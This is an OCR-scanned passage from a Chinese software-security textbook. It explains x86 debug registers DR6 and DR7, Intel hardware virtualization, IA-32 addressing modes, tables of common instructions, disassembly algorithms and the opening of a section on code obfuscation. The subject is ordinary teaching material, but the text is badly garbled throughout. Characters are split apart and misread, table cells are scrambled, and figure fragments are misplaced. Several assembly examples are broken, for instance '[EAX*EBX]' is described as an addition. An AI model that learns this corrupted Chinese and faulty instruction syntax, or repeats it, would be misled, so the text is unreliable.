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DR6 是 调试 状态 寄存 器 ,用 于 判断 何 种 原因 触发 了 异常 ,其 中 的 BO 一 B3 位 记录 了 
DR0 一 DR3 中 的 哪个 寄存 器 产生 了 调试 中 断 。 例 如 ,B2 位 置 的 值 为 1, 表 示 对 应 的 寄存 
器 DR2 指定 的 断 点 触发 了 中 断 。BD 位 是 调试 寄存 器 访问 检测 位 ,与 DR7 的 GD 位 关 
联 , 当 GD 位 置 1, 上 且 CPU 检测 到 修改 调试 寄存 器 的 指令 时 ,CPU 停止 该 指令 执行 ,将 BD 
位 置 1 ,执行 权 交 给 调试 异常 (并 DB) 处 理 程序 。BS 位 是 单 步 标记 ,与 EFLAGS 的 TF 位 
关联 ,该 位 为 1 时 表示 异常 是 由 单 步 执行 触发 的 。BT 位 是 任务 开关 位 ,与 任务 状态 段 
TSS 的 工 标志 关联 ,CPU 进行 任务 切换 时 如 果 发 现下 一 个 任务 的 TSS 的 工 标志 位 为 1， 
就 将 BT 位 置 1, 并 中 断 到 调试 中 断 处 理 程序 。 

DR? 是 调试 控制 寄存 器 ,控制 调试 断 点 触发 条 件 , 其 中 的 L0、G0、RWO0 fl LENO 与 
DRO 构成 男 一 组 断 点 条 件 ,L1、G1、RW1 和 LENI 与 DR1 构成 男 一 组 断 点 条 件 , 以 此 类 
推 ,共有 4 组 。L0 一 L3 分 别 与 DR0 一 DR3 对 应 ,用 来 启用 或 禁止 对 应 断 点 的 局 部 匹配 ， 
如 果 该 位 置 1,CPU 在 当前 任务 中 检测 到 满足 所 定义 的 断 点 条 件 时 便 触发 中 断 ,并 自动 
清除 此 位 ,该 位 置 0 时 禁用 此 断 点 。G0 一 G3 也 分 别 与 DRO— DR3 对 应 ,用 来 全 局 启用 或 
禁止 对 应 断 点 。 如 果 该 位 置 1,CPU 在 任何 任务 中 检测 到 满足 所 定义 的 断 点 条 件 时 都 会 
中 断 ;如 果 该 位 置 为 0, 便 禁用 此 全 局 断 点 ,与 LO 一 L3 不 同 的 是 中 断 触 发 时 不 会 自动 清除 
G0~G3 f, RWO—RWS3 分 别 与 DRO—DR3 3X 4 个 调试 器 地 址 寄存 器 对 应 ,用 来 指定 被 
监控 地 址 的 访问 类 型 ,字段 含义 如 下 : 

。 00, 表 示 仅 当 执行 对 应 地 址 的 指令 时 触发 中 断 。 

。 01, 表 示 仅 当 向 对 应 地 址 写 数据 时 触发 中 断 。 

* 10, 表 示 保 留 ,通过 CR4 的 DE 位 调试 扩展 , 当 向 对 应 地 址 进行 输入 输出 操作 时 触 

发 中 断 。 

* 11, 表 示 当 向 对 应 地 址 读 写 数据 时 触发 中 断 , 从 该 地 址 读 取 指 令 不 中 断 。 

LEN0 一 LEN3 也 分 别 与 DRO — DR3 对 应 ,用 来 指定 要 监控 的 区 域 长 度 ,字段 含义 
如 下 : 

。 00, 表 示 1B。 

。 01, 表 示 2B。 

* 10, 表 示 8B 或 未 定义 ,不 同 处 理 器 有 差异 。 

* 11 ,表示 4B。 

LE 和 GE 位 在 早期 CPU 中 用 于 启用 或 禁用 数据 断 点 匹配 , 置 1 时 启用 数据 断 点 匹 
配 ,CPU 会 降低 执行 速度 ,以 监视 和 保证 当前 有 指令 要 访问 符合 断 点 条 件 的 数据 时 产生 
调试 异常 ,从 486 开始 的 LA-32 处 理 器 都 忽略 了 这 两 位 。GD 位 是 调试 寄存 器 保护 开关 ， 
用 于 启用 或 禁用 对 调试 寄存 器 的 保护 , 当 置 1 时 开启 ,如 果 CPU 检测 到 修改 调试 寄存 器 
(CDR0 一 DR7) 的 指令 操作 ,就 会 在 执行 指令 前 触发 一 个 调试 异常 。 

注意 : 修改 栈 段 寄存 器 SS 的 指令 的 下 一 行 指令 的 断 点 永远 不 会 触发 ,这 是 为 了 保证 
栈 段 寄存 器 SS 和 栈 顶 指针 ESP 的 一 致 性 ,CPU 执行 MOV SS、POP SS 指令 时 会 禁止 所 
有 中 断 , 直 到 执行 完 下 一 条 指令 。 但 连续 的 MOV SS 指令 只 保护 第 一 条 ,如 下 所 示 : 

MOV SS,EAX MOV SS,EAX 


MOV ESP,EBP ;此 处 的 断 点 无 效 ”MOV  SS,EBX 
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216 虚拟 化 支持 


虚拟 化 技术 能 够 基于 系统 CPU 内存、 磁盘 等 资源 虚拟 出 多 台 主 机 ,提高 资源 利用 
率 , 最 大 化 利用 平台 的 硬件 资源 。 虚 拟 化 的 架构 如 图 2-6 所 示 ,在 硬件 资源 之 上 运行 虚拟 
机 监控 器 VMM., TE VMM 之 上 运行 虚拟 机 系统 Guest OS. 


MOV ESP,EBP ; 断 点 有 效 





虚拟 机 系统 (Guest OS) 虚拟 机 系统 (Guest OS) 














虚拟 机 监控 器 (VYMM) 








硬件 











图 2-6 虚拟 化 架构 图 


早期 的 虚拟 化 技术 完全 依赖 于 软件 模拟 实现 ,资源 消耗 大 ,性 能 低 。 经 过 近 10 年 的 
发 展 ,硬件 架构 逐渐 引入 了 对 虚拟 化 的 支持 ,以 解决 虚拟 化 的 困难 和 提高 虚拟 化 的 性 能 。 
典型 的 代表 包括 Intel 公司 在 2006 年 引入 的 VT 技术 和 AMD 公司 引入 的 AMD-V 技 
术 。 本 节 以 Intel 公司 的 VT 技术 对 硬件 虚拟 化 的 支持 进行 介绍 。VT 是 一 个 芯片 辅助 
的 虚拟 化 技术 ,可 以 同时 提升 虚拟 化 效率 和 虚拟 机 的 安全 性 ,Intel 公司 的 VT 技术 具体 
包括 VT-X, VT-D 和 VT-C HR. 

VT-X 是 针对 处 理 器 的 虚拟 化 技术 ,提供 内 存 以 及 虚拟 机 的 硬件 隔离 ,所 涉及 的 技术 
有 页 表 管理 以 及 地 址 空间 的 保护 。 另 外 ,通过 引入 新 的 处 理 器 运行 模式 和 新 的 指令 ,使 得 
VMM 和 Guest OS 运行 于 不 同 模式 ,Guest OS 运行 于 受 控 模 式 ,敏感 指令 在 受 控 模 式 下 
全 部 会 陷入 VMM ,从 而 解决 部 分 非特 权 指 令 的 敏感 指令 的 陷入 模拟 难题 ,而 且 模 式 切 换 
时 上 下 文 的 保存 恢复 由 硬件 来 完成 ,提高 了 上 下 文 切换 的 效率 。 

VT-D 是 处 理 有 关 芯 片 组 的 技术 ,提供 一 些 针 对 虚拟 机 的 特殊 应 用 ,如 支持 某 些 特定 
的 虚拟 机 应 用 跨 过 处 理 器 L/O 管理 程序 ,通过 直接 调用 L/O 资源 ,从 而 最 大 化 地 提高 1/0 
HERE. Æ VT-D 技术 出 现 之 前 ,虚拟 机 监视 器 (VMM) 必 须 直 接 参与 每 项 T/O 交互 ,这 不 
仅 会 减缓 数据 传输 速度 ,还 会 由 于 更 频繁 的 VMM 活动 而 增 大 硬件 处 理 器 的 负载 。 

VT-C 是 支持 连接 的 Intel 虚拟 化 技术 ,包括 虚拟 机 设备 队列 (VMDq)、 虚 拟 机 直接 
互 连 (VMDc) 技 术 。VMDq 能 够 最 大 限度 地 提高 L/O 吞吐 率 ,传统 的 VMM 必须 对 每 个 
单独 的 数据 包 进 行 分 类 ,并 将 其 发 送 到 为 其 分 配 的 虚拟 机 ,这 样 会 占用 大 量 的 处 理 器 周 
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期 。 借助 VMDq, 该 分 类 功能 可 由 Intel 服务 器 网 卡 内 的 专用 硬件 来 执行 ,VMM 只 需 负 
责 将 预 分 类 的 数据 包 组 发 送 到 适当 的 客户 操作 系统 ,减缓 了 1/0 延迟 ,使 处 理 器 有 更 多 
的 资源 来 处 理 业务 应 用 。VMDc 支持 虚拟 机 直接 访问 网 络 1/O 硬件 ,从 而 显著 提升 了 虚 
拟 性 能 。 


2.2 反 汇 编 及 对 抗 技术 


在 恶意 代码 与 软件 漏洞 分 析 过 程 中 ,软件 逆向 分 析 是 一 项 基本 的 技能 ,这 一 技能 包括 
反 汇 编 及 对 抗 技术 。 而 要 掌握 反 汇 编 及 对 抗 技术 ,首先 要 熟悉 汇编 语言 的 相关 基础 ,因此 
本 节 从 汇编 语言 . 反 汇 编 方 法 与 原理 介绍 反 汇编 基础 ,同时 介绍 代码 混淆 、 反 调试 的 对 抗 
技术 。 


221 汇编 语言 


汇编 语言 是 一 种 用 于 计算 机 、 微 处 理 器 、 微 控制 器 或 其 他 可 编程 器 件 的 低级 语言 ， 
称 为 符号 语言 。 汇 编 语言 中 使 用 助 记 符 代表 机 器 指令 的 操作 码 , 使 用 地 址 符号 或 标号 代 
替 指 令 或 操作 数 的 地 址 ,不 同 的 硬件 架构 对 应 不 同 的 机 器 语言 指令 集 ,通过 汇编 过 程 转换 
成 机 器 指令 。 本 书 以 IA-32 为 例 ,介绍 汇编 指令 寻 址 方式 和 软件 分 析 中 常用 的 汇编 指令 。 

1. 寻 址 方式 

理解 指令 寻 址 方式 是 读 懂 汇编 指令 的 基础 。IA-32 架构 的 微 处 理 器 支持 的 数据 寻 址 
方式 包括 寄存 器 寻 址 、 立 即 寻 址 、 直 接 寻 址 、 寄 存 器 间接 寻 址 、 基 址 变 址 寻 址 、 寄 存 器 相对 
寻 址 和 相对 基 址 加 变 址 寻 址 、 比 例 变 址 寻 址 ,本 节 以 MOV 指令 为 例 进 行 介绍 。 

寄存 器 寻 址 是 最 通用 的 数据 寻 址 方式 ,使 用 寄存 器 的 别名 作为 操作 数 , 支 持 8 位、 
16 位 、32 位 、64 位 的 操作 数 长 度 。 例 如 : 


MOV AL,BL ;将 8 位 的 BL Sd S) an 

MOV AX, CX ;将 16 位 的 cx 复制 到 ax, ax 的 高 16 位 不 变 

MOV ESP,EDX ;将 32 位 的 EDx 复 制 到 ese 

MOV RAX,RDX ;将 64 位 的 ROX 复制 到 RAX 

立即 寻 址 是 指 指令 的 源 操作 数 为 立即 数 , 同 样 支持 8 位 、16 (2,32 位 .64 位 。 例 如 : 
MOV BL,44 ;8 位 

MOV BX,0 ?16 位 

MOV ESI,1001B ;32 位 

MOV RCX,100H ;64 位 


直接 数据 寻 址 在 典型 应 用 程序 中 广泛 应 用 ,这 种 寻 址 方式 是 将 位 移 量 加 到 默认 数据 
段 地址 或 其 他 段 地 址 上 形成 地 址 。 例 如 : 
MOV AL, Number ;将 数据 段 存储 单元 Number 中 的 8 位 数据 复制 到 寄存 器 中 


MOV Home,AX ;将 下 寄存 器 中 的 16 位 数据 复制 到 字 存 储 单元 Home 中 
MOV EDI,DS:[2000H] ;将 数据 段 中 0x2000 存储 单元 中 的 双 字 数据 复制 到 EDI 中 


- 


Ne/ 软件 安全 分 析 与 应 用 


MOV RAX,Suml ;将 存储 单元 suml 中 的 8 字 节 数据 复制 到 RAX 中 

寄存 器 间接 寻 址 是 通过 BP、BX、DI、SI 等 保存 偏 移 地 址 的 一 种 寻 址 方式 。 例 如 : 
MOV CL, [EBX] ;将 数据 段 中 EBX 寻 址 单元 的 1 字 节 内 容 复 制 到 cL 寄存 器 中 
MOV [EDI], BX ;将 2 字 节 的 BX 数据 复制 到 数据 段 中 EDI 寻 址 的 2 字 节 单元 
MOV EAX, [EDX] ;将 数据 段 中 EDx 寻 址 的 双 字 内 容 复 制 到 EAx 寄存 器 中 


基 址 加 变 址 寻 址 类 似 于 间接 寻 址 ,需要 基 址 寄存 器 (EBP、EBX) 和 变 址 寄存 器 (EDI、 
ESI) 释 加 使 用 进行 寻 址 。 例 如 : 


MOV CL, [EBX+EDI] ;把 由 EBX+EDI 寻 址 的 数据 段 1 字 节 内 容 复 制 到 cr 寄存 器 
MOV [EBX+ESI], AX ;把 区 寄存 器 内 容 复制 到 EBX+ESI 寻 址 的 数据 段 2 字 节 单元 
MOV EAX, [EAX*EBX] ;把 由 EAX+ EBX 寻 址 的 数据 段 4 字 节 内 容 复 制 到 EAX 


寄存 器 相对 寻 址 类 似 于 基 址 加 变 址 寻 址 和 位 移 量 寻 址 ,用 位 移 量 加 基 址 或 变 址 寄存 
器 的 内 容 寻 址 数据 段 中 存储 的 数据 。 例 如 : 


MOV AL, [EDI+ 100H] ;把 EDI+ 1008 寻 址 的 数据 段 单 元 中 的 1 字 节 内 容 复制 到 AL 
MOV Arr[ESI],BX ;把 Bx 中 的 内 容 复 制 到 由 Arr+EsI 寻 址 的 数据 段 2 字 节 单元 
MOV Arr[EBX],EAX ;把 EAX 中 内 容 复 制 到 由 arr+EBX 寻 址 的 数据 段 4 字 节 单元 


相对 基 址 加 变 址 寻 址 类 似 于 基 址 加 变 址 寻 址 方式 ,用 基 址 寄存 器 和 变 址 寄存 器 加 位 
移 量 组 成 存储 器 地 址 ,这 种 寻 址 方式 通常 用 来 寻 址 存储 器 中 的 二 维 数组 数据 。 例 如 : 
MOV DH, [BX+ DI+ 20H] ;把 BX+ DI+20H 寻 址 的 1 字 节 内 容 复 制 到 DH 中 


MOV AX,FILE[BX* DI] ;把 FTLE+BX+DI 寻 址 的 2 字 节 内 容 复 制 到 zx 中 
MOV LIST[EBP+ESI+4],EAX ” ;把 EAX 复 制 到 LIST+ EBP+ESI+4 寻 址 的 堆栈 段 4 字 节 单 元 


比例 变 址 寻 址 是 使 用 两 个 32 位 寄存 器 ( 基 址 寄存 器 和 变 址 寄存 器 ) ,第 2 个 寄存 器 与 
比例 因子 (1、2、4 或 8) 相 乘 进行 数据 寻 址 的 一 种 方式 。 例 如 : 


MOV AL, [EBX+ ECX] ;操作 长 度 8 位 ,比例 因子 为 1 
MOV AX,[EAX*2* EDI+100H] ;操作 长 度 16 位 ,比例 因子 为 2 
MOV EAX,Arr[4* ECX] ;操作 长 度 32 位 ,比例 因子 为 4 
MOV RCX, [RAX +8 * ESI] ;操作 长 度 64 位 ,比例 因子 为 8 
2. 常用 的 汇编 指令 


汇编 指令 按照 功能 分 类 大 致 可 分 为 数据 传送 指令 ,算术 与 逻辑 运算 指令 程序 控制 指 
令 等 。 
首先 简要 介绍 指令 格式 ,如 2 目 操作 数 的 情况 : OP NUMI NUM2, 其 中 OP 为 操作 
码 助 记 符 ,NUM1 是 第 一 个 操作 数 , 称 为 目的 操作 数 ,NUM2 是 第 二 个 操作 数 , 称 为 源 操 
作 数 。 

数据 传送 指令 包括 MOV 类 指令 堆栈 类 指令 .装载 地 址 类 指令 .数据 串 传 送 类 指令 、 
T/O 传送 类 指令 和 其 他 类 传送 指令 ,如 表 2-3 所 示 。 


R23 常用 数据 传送 指令 


feno RUDI e^ 
类 别 代表 指令 说 朋 


mov 是 常用 的 基础 指令 ,第 一 个 操作 数 为 目的 操作 数 ,第 二 个 操作 
数 为 源 操作 数 ,含义 是 将 第 二 个 操作 数 的 内 容 复 制 到 第 一 个 操作 








mov 数 ,两 个 操作 数 可 以 同时 为 寄存 器 ,或 者 其 中 一 个 为 寄存 器 ,不 能 同 
movsb 时 为 内 存 , 因为 同时 为 内 存 无 法 确定 复制 的 长 度 是 几 个 字 节 。 
movsw movsb/w/d/q 是 串 复制 指令 ,通常 与 rep 联合 使 用 进行 串 复制 ,ecx 
MOV 类 movsd 控制 复制 次 数 ,其 中 EDI 指向 目的 地 址 ,ESI 指向 源 地 址 ,执行 后 根 
movsq 据 长 度 和 方向 修改 EDI 和 ESI, 复 制 次 数 ECX 递减 直到 为 0,movsb 
movsx 是 以 1 字 节 为 单位 ,movsw 是 以 字 为 单位 ,movsd 是 以 双 字 为 单位 ， 
movzx movsq 是 以 8 字 节 为 单位 。 另 外 ,movsx 是 带 符号 的 扩展 ,高 位 用 符 


号 位 填充 ,例如 movsx eax,cx, 用 于 源 操 作 数 长 度 小 于 目的 操作 长 度 
的 情况 。movzx 类 似 , 是 无 符号 扩展 ,前 面 用 0 填充 

堆栈 类 push opl push 是 压 栈 指令 ,将 操作 数 复制 到 栈 顶 , 栈 指针 下 移 

pop opl pop 是 弹出 栈 指令 ,将 栈 中 数据 复制 到 操作 数 地 址 , 栈 指针 上 移 


lea eax, num lea eax, num 是 将 num 的 偏 移 地 址 装 入 eax 
lds edi, list lds edi, list 是 将 存储 单元 的 48 位 内 容 载 人 EDI 和 DS 
les edi, list les edi, list 是 将 存储 单元 的 48 位 内 容 载 人 EDI 和 ES 








装载 地 址 类 











lfs edi, list lfs edi, list 是 将 存储 单元 的 48 位 内 容 载 人 EDI 和 FS 

les esi, list les esi, list 是 将 存储 单元 的 48 位 内 容 载 人 ESI 和 CS 

lss esp, list lss esp, list 是 将 存储 单元 的 48 位 内 容 载 人 ESP 和 SS 

lods 类 指令 是 将 ESI 指 向 的 内 存 数据 复制 到 RAX/EAX/AX/AL 寄 

lodsd 存 器 ,取决 于 所 用 指令 的 字 长 。 lodsb 对 应 AL, 执 行 后 ESI 增 1 或 减 
数据 上 串 传 | lodsa 1, 增 减 取决 于 标记 位 寄存 器 的 方向 标志 DF 位 ,DF 为 0 递增 ,DF 为 
1 递减 。lodsw lodsd lodsq 类 似 , 字 节 数 分 别 为 2、4、8。stosb 是 将 
t doet AL 内 容 复制 到 EDI 指 向 的 内 存 ,执行 后 EDI 增 1 或 减 1 ,同样 取决 

d 于 DF 标志 位 。stosw、stosd、stosq 类似, 字 节 数 分 别 为 2.4、8。stos 

- 类 指令 常用 于 内 存 数据 批量 初始 化 

stosq 

INSB 

INSW INS 类 指令 用 于 从 1/O 设备 把 字 节 、 字 或 双 字 数据 传送 到 附加 段 内 
1/0 传送 类 INSD EDI TIEA Mo - 

OUTSB OUTS 类 指令 用 于 将 附加 段 内 的 ESI 寻 址 的 存储 单元 数据 传送 到 

OUTSW vog 

OUTSD 

xchg xchg 交互 两 个 操作 数 的 数据 

lahf lahf 将 标记 位 后 8 位 复制 到 AH 
其 他 传送 | sahf sahf 是 把 AH 内 容 复 制 到 标记 位 寄存 器 
指令 xlat xlat 是 通过 查 表 方 式 的 换 码 指令 ,使 用 AL 和 BX 寄存 器 

bswap bswap 是 将 操作 数 的 字 节 序 倒 转 

cmov cmov 是 条 件 复 制 指令 , 当 测试 标记 位 满足 条 件 时 执行 











算术 与 逻辑 运算 指令 分 为 4 类 : 加 , 减 、 乘 \ 除 指令 ,比较 指令 ,与 ,或 . 非 、 异 或 逻辑 运 
算 指令 以 及 移 位 运算 指令 ,如 表 2-4 所 示 。 
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表 2-4 常用 算术 与 逻辑 运算 指令 





指令 类 | 代表 指令 


说 上 明 





四 则 运算 


add 是 不 带 进位 的 加 法 ,将 源 操作 数 与 目的 操作 数 相 加 ,结果 存储 到 目的 操 
作 数 ,如 add eax, ebx 是 将 eax 与 ebx 相 加 ,结果 存储 到 eax 中 。adc 是 带 
进位 的 加 法 ,将 源 操作 数 、 目 的 操作 数 和 进位 标志 位 CF 相 加 ,结果 存储 到 
目的 操作 数 中 。sub 是 减法 指令 ,目的 操作 数 减 去 源 操作 数 ,结果 存储 到 目 
的 操作 数 ,sbb 是 带 借 位 的 减法 指令 。 乘 法 指令 有 mul 和 imul, 将 第 一 个 操 
作 数 与 EAX/AX/AL 相 乘 ,结果 存储 到 EDX/DX/AH 和 EAX/AX/AL 
中 。 除 法 指令 有 div 和 idiv, 操 作 数 为 4 字 节 时 用 EDX: EAX 除 以 第 一 个 
操作 数 , 商 存储 在 EAX 中 ,余数 存在 EDX 中 





cmpxchg 


cmp 只 改变 标记 位 ,不 改变 源 操作 数 和 目的 操作 数 
cmpxchg 将 目的 操作 数 与 累加 器 EAX 比较 ,如 果 相 等 ,将 源 操作 数 复制 到 
目的 操作 数 中 ,如 果 不 等 ,将 目的 操作 数 复制 到 EAX 中 





and 是 源 操作 数 和 目的 操作 数 与 运算 ,结果 存储 到 目的 操作 数 
or 是 源 操作 数 和 目的 操作 数 或 运算 ,结果 存储 到 目的 操作 数 
xor 是 源 操作 数 和 目的 操作 数 异 或 运算 ,结果 存储 到 目的 操作 数 
not 是 目的 操作 数 按 位 取 反 ,结果 存储 到 目的 操作 数 

neg 是 目的 操作 数 符号 取 反 ,结果 存储 到 目的 操作 数 








sh 是 逻辑 左 移 运 算 , 把 0 移 和 人 最 低位 ,高 位 移 到 CF 标志 位 
sal 是 算术 左 移 运 算 , 把 0 移 人 最 低位 ,高 位 移 到 CF 标志 位 
shr 是 逻辑 右 移 运 算 , 把 0 移 人 最 高 位 ,低位 移 到 CF 标志 位 
sar 是 算术 右 移 运算 ,把 符号 移 人 最 高 位 ,低位 移 到 CF 标志 位 
rcl 是 C 标志 参与 移 位 的 循环 左 移 运算 

rol 是 C 标志 不 参与 移 位 的 循环 左 移 运 算 

rcr 是 C 标志 参与 移 位 的 循环 右 移 运算 

ror 是 C 标志 不 参与 移 位 的 循环 右 移 运算 





程序 控制 指令 包括 转移 指令 、 循 环 控制 指令 .过 程 调用 指令 .中 断 指令 、 机 器 控制 指令 


等 ,如 表 2-5 所 示 。 


ARIS 常用 程序 控制 指令 

















指令 类 | 代表 指令 说 oH 
jmp 
jmp 是 无 条 件 跳 转 指令 ,可 以 是 长 跳 转 或 者 短 跳 转 , 操 作 数 支持 立即 数 .内 存 、 
转移 pi 寄存 器 。 其 他 条 件 跳 转 指令 也 类 似 ,区 别 在 于 根据 标志 位 决定 是 否 跳 转 , 若 
i á 不 跳 转 则 顺序 执行 
jg 
循环 控制 loop loop 指令 将 ECX WÈ 1, 与 jnz 组 合 形成 条 件 转移 指令 ,ECX 不 为 0 跳 转 
rep rep 指令 将 ECX WÈ 1. 5j movsd.lodsd 等 组 合 形成 串 复制 操作 
过 程 调用 | “中 | call 是 本 数 调用 指令 ,将 指令 指针 寄存 器 压 栈 , 然 后 将 跳 转 地 址 载 人 指令 指针 
ret 寄存 器 。ret 是 函数 返回 指令 ,将 栈 顶 数据 弹出 给 指令 指针 寄存 器 











feno 基础 知识 w^ 
* 








续 
指令 类 | 代表 指令 说 H 
int int 是 中 断 调用 指令 ,后 面 跟 中 断 号 ,执行 中 断 处 理 前 会 保护 cpu 现场 
中 断 into into 是 触发 一 个 溢出 中 断 , 到 溢出 处 理 流程 中 执行 


iret iret 是 中 断 返回 指令 ,恢复 中 断 前 的 CPU 现场 继续 执行 之 前 的 任务 


stc stc 将 进位 标志 设 为 1 
clc clc 将 进位 标志 设 为 0 
机 器 控制 cme cme 将 进位 标志 取 反 
nop nop 是 空转 指令 
hlt hlt 是 停机 指令 

















222 反 汇 编 


反 汇编 是 将 机 器 语言 转换 成 汇编 代码 的 过 程 ,将 人 类 难以 理解 的 机 器 语言 转换 成 具 
有 符号 语义 的 指令 语言 。 反 汇编 一 个 程序 文件 需要 解决 诸多 问题 ,包括 最 基本 的 区 分 程 
序 中 的 代码 和 数据 ,把 代码 转换 成 汇编 语言 等 ,此 外 还 有 诸多 附加 要 求 , 如 反 汇 编 定 位 函 
数 , 识 别 跳 转 表 ,确定 局 部 变量 等 。 

基本 的 反 汇 编 流 程 包括 4 个 步骤 : 

(1) 确定 反 汇 编 的 代码 区 域 , 即 区 分 出 程序 的 代码 和 数据 段 。 由 于 冯 。 诺 依 曼 的 计 
算 机 体系 结构 将 数据 和 代码 混杂 在 一 起 ,区 分 出 代码 和 数据 是 反 汇编 的 前 提 。 以 
Windows 可 执行 文件 为 例 , 其 遵循 PE 格式 规范 (Linux 系统 的 程序 遵循 ELF 格式 规 
范 ), 通 过 解析 格式 可 以 定位 程序 文件 中 包含 的 代码 和 代码 入 口 的 位 置 。 

(2) 确定 了 程序 代码 入 口 之 后 , 读 取 该 位 置 的 二 进 制 机 器 指令 ,执行 表 查 找 , 将 机 器 
码 的 值 与 它 对 应 的 汇编 语言 助 记 符 提取 出 来 ,然后 根据 指令 状态 机 提取 操作 数 。 这 一 过 
程 的 复杂 度 因 处 理 器 的 指令 集 而 异 , 对 于 指令 长 度 可 变 的 Intel 指令 需要 检索 额外 的 指令 
字 节 。 

(3) 获取 指令 并 解码 出 所 有 操作 数 之 后 ,需要 对 它 的 汇编 语言 等 价 形式 进行 格式 化 ， 
输出 反 汇 编 代 码 。 主 要 的 x86 汇编 语法 有 两 种 : Intel 格式 和 ATT 格式 , Windows 下 
常用 Intel 格式 。 

(4) 完成 一 条 指令 的 反 汇 编 之 后 ,重复 上 述 过 程 , 继 续 反 汇编 下 一 条 指令 ,直到 反 汇 
编 完 程 序 文件 中 的 指令 代码 。 

对 于 从 何 处 开始 反 汇 编 , 如 何 选择 下 一 条 反 汇 编 指令 ,如 何 区 分 代码 与 数据 ,以 及 如 
何 确 定 是 否 完成 了 最 后 一 条 指令 的 反 汇 编 , 有 诸多 的 算法 可 以 满足 要 求 , 典 型 的 是 线性 扫 
描 和 递归 下 降 扫 描 算法 。 

线性 扫描 反 汇 编 算法 假设 程序 中 的 代码 节 所 包含 的 全 部 是 机 器 语言 指令 , 反 汇编 从 
代码 的 第 一 个 字 节 开 始 , 以 线性 模式 扫描 整个 代码 段 ,指令 结束 的 位 置 是 下 一 条 指令 开始 
的 位 置 , 反 汇 编 过 程 中 可 以 计算 每 一 条 指令 的 长 度 , 用 于 确定 下 一 条 将 要 反 汇 编 的 指令 位 
置 ,逐条 解析 每 一 条 指令 进行 反 汇 编 , 直 到 代码 段 结尾 。 线 性 扫描 算法 的 优点 是 能 够 完全 

盖 程 序 所 有 代码 ;缺点 是 不 会 通过 识别 分 支 等 非 线性 指令 提取 程序 的 控制 流 , 且 没有 考 


软件 安全 分 析 与 应 用 


虑 到 代码 中 混 有 数据 的 情况 ,将 数据 当成 指令 解析 可 能 导致 无 法 预 估 的 错误 。 采 用 线性 
扫描 反 汇 编 算法 的 工具 有 GNU 调试 器 gdb, 微 软 公司 的 WinDbg 调试 器 和 objdump。 

递归 下 降 扫 描 反 汇编 算法 加 入 了 对 控制 流 指令 的 深度 解析 ,根据 一 条 指令 是 否 被 另 
一 条 指令 引用 来 决定 是 否 对 其 进行 反 汇 编 , 将 CPU 指令 进行 分 类 处 理 ,处 理 过 程 中 需要 
维护 一 个 队列 ,记录 待 处理 的 分 支 人 口 ,这 个 队列 称 为 待 处 理 列表 。 

。 顺序 流 指令 。 这 类 指令 将 执行 权 传递 给 紧 随 其 后 的 下 一 条 指令 ,包括 数据 传送 指 
4 ,算术 与 逻辑 运算 指令 ,如 mov, push, pop, lodsd, add, sub, mul, div, and, or, 
xor,rol.ror 等 。 这 类 指令 的 反 汇 编 按 照 线性 扫描 的 方式 处 理 。 

条 件 分 支 指令 。 这 类 指令 提供 两 条 可 能 的 执行 路 径 。 例 如 jnz, 条 件 成 立时 执行 
分 支 , 修 改 指令 指针 寄存 器 使 其 指向 分 支 目标 ;条 件 不 成 立时 以 线性 模式 执行 下 
一 条 指令 。 静 态 扫 描 时 无 法 测试 条 件 是 否 成 立 ,递归 下 降 算法 需要 反 汇 编 处 理 这 
两 条 路 径 , 处 理 方法 是 将 分 支 目 标 指令 地 址 添加 到 待 处 理 列表 中 ,顺序 扫描 的 分 
支 结 束 后 ,扫描 待 处 理 列表 地 址 为 人 口 的 分 支 。 

无 条 件 分 支 指令 。 这 类 指令 只 提供 一 条 执行 路 径 , 如 jmp, 递 归 下 降 反 汇编 器 尝 
试 确定 无 条 件 跳 转 的 目标 ,将 目标 地 址 作为 下 一 条 反 汇 编 的 位 置 。 但 有 些 情况 下 
跳 转 目标 取决 于 运行 时 的 值 ,静态 扫 描 无 法 确定 跳 转 目标 ,如 jmp ecx 指令 ,过 到 
这 些 指令 需要 特殊 处 理 。 

函数 调用 指令 。 这 类 指令 的 执行 与 无 条 件 分 支 指令 相似 。 例 如 call 指令 ,同样 无 
法 确定 call ecx 的 下 一 条 指令 。 两 者 区 别 在 于 call 函数 执行 完 之 后 需要 返回 到 调 
用 指令 的 下 一 条 指令 继续 执行 。 因 此 在 递归 下 降 反 汇编 处 理 时 可 以 与 条 件 分 支 
指令 做 类 似 的 处 理 , 递 归 下 降 反 汇编 器 尝试 计算 函数 调用 地 址 ,将 目标 地 址 添加 
到 待 处 理 列表 中 ,然后 按照 线性 扫描 方式 继续 解析 下 一 条 指令 。 

返回 指令 。 这 类 指令 通常 用 于 函数 结尾 ,如 ret 指令 ,静态 分 析 时 无 法 提供 下 一 条 
指令 信息 ,递归 下 降 反 汇编 引擎 将 其 作为 分 支 结 束 条 件 , 转 而 去 解析 待 处 理 列 表 
中 的 指令 , 当 待 处 理 列表 为 空 时 ,扫描 结束 。 

递归 下 降 扫 描 反 汇编 算法 的 优点 是 能 够 区 分 代码 与 数据 。 其 缺点 是 无 法 处 理 间接 代 
码 路 径 ( 如 jmp eax,call eax) ,需要 对 循环 进行 识别 和 处 理 ,否则 将 导致 无 止境 的 重复 分 
析 。 采 用 递归 下 降 扫描 反 汇 编 算法 的 工具 有 IDA Pro 反 汇 编 工 具 。 

223 代码 混淆 

代码 混淆 是 一 种 将 计算 机 程序 代码 转换 成 一 种 功能 上 等 价 ,但 是 难以 阅读 和 理解 的 
变形 。 代 码 混淆 可 以 分 为 程序 源 代码 混淆 和 二 进 制 代码 混淆 。 

源 代码 的 混淆 可 以 将 代码 中 的 变量 、 函 数 、 类 的 名 称 改 成 毫 无 意义 的 名 字 , 比 如 单个 
字母 .无 意义 的 字母 组 合 . 字 母 数字 编号 .甚至 是 多 个 下 画 线 组 合 ” ”代表 不 同 变量 ,使 得 
阅读 代码 者 难以 猜测 其 用 途 。 源 代码 的 混淆 还 可 以 通过 修改 代码 部 分 逻辑 使 其 功能 等 
价 , 但 更 难以 理解 ,比如 添加 无 用 代码 ,修改 循环 为 递归 ,精简 中 间 变 量 , 打 乱 代 码 格式 ,多 
行 代码 写 到 一 行 或 者 一 行 代码 拆 成 多 行 等 方式 。 

二 进 制 代码 混淆 是 应 用 最 为 广泛 的 混淆 手 段 , 主 要 应 用 于 对 抗 逆向 的 版 权 保护 和 恶 


第 2 章 ”基础 知识 


意 代 码 的 反 检 测 。 对 软件 的 非法 自 改 和 恶意 代码 的 分 析 需 要 借助 反 汇编 工具 从 目标 代码 
中 提取 出 汇编 代码 ,甚至 反 编译 出 高 级 语言 代码 ,然后 通过 阅读 汇编 代码 或 高 级 语言 代码 
